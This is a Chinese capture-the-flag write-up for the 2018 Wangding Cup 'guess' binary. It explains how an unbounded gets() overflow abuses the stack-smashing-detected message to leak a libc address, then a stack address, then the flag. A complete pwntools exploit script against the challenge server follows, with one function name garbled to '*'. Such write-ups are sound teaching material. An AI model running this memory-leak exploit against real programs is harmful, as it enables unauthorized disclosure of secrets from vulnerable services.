欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

网鼎杯2018 guess(stack smashing)

程序员文章站 2022-05-19 10:01:41
...

wdb2018_guess stack smashing

首先,检查一下程序的保护机制

网鼎杯2018 guess(stack smashing)

然后,我们用IDA分析一下

Flag读取并存储在栈里

网鼎杯2018 guess(stack smashing)

Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。

网鼎杯2018 guess(stack smashing)

由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为了得到glibc地址。得到glibc地址,是为了计算出stack_end变量的地址,进而,第二次,我们泄露栈地址,计算出flag存放的地址,于是,第三次,我们就可以泄露flag的值。

#coding:utf8
from pwn import *
from LibcSearcher import *

#sh = process('./GUESS')
sh = remote('node3.buuoj.cn',29890)
elf = ELF('./GUESS')
puts_got = elf.got['puts']

def *(payload):
   sh.sendlineafter('Please type your guessing flag',payload)

#泄露puts地址
*('a'*0x128 + p64(puts_got))
sh.recvuntil('stack smashing detected ***: ')
puts_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
environ_addr = libc_base + libc.dump('__environ')
print 'environ_addr=',hex(environ_addr)
#泄露栈地址
*('a'*0x128 + p64(environ_addr))
sh.recvuntil('stack smashing detected ***: ')
stack_addr = u64(sh.recv(6).ljust(8,'\x00'))
flag_addr = stack_addr - 0x168
print 'flag_addr=',hex(flag_addr)
#泄露flag
*('a'*0x128 + p64(flag_addr))

sh.interactive()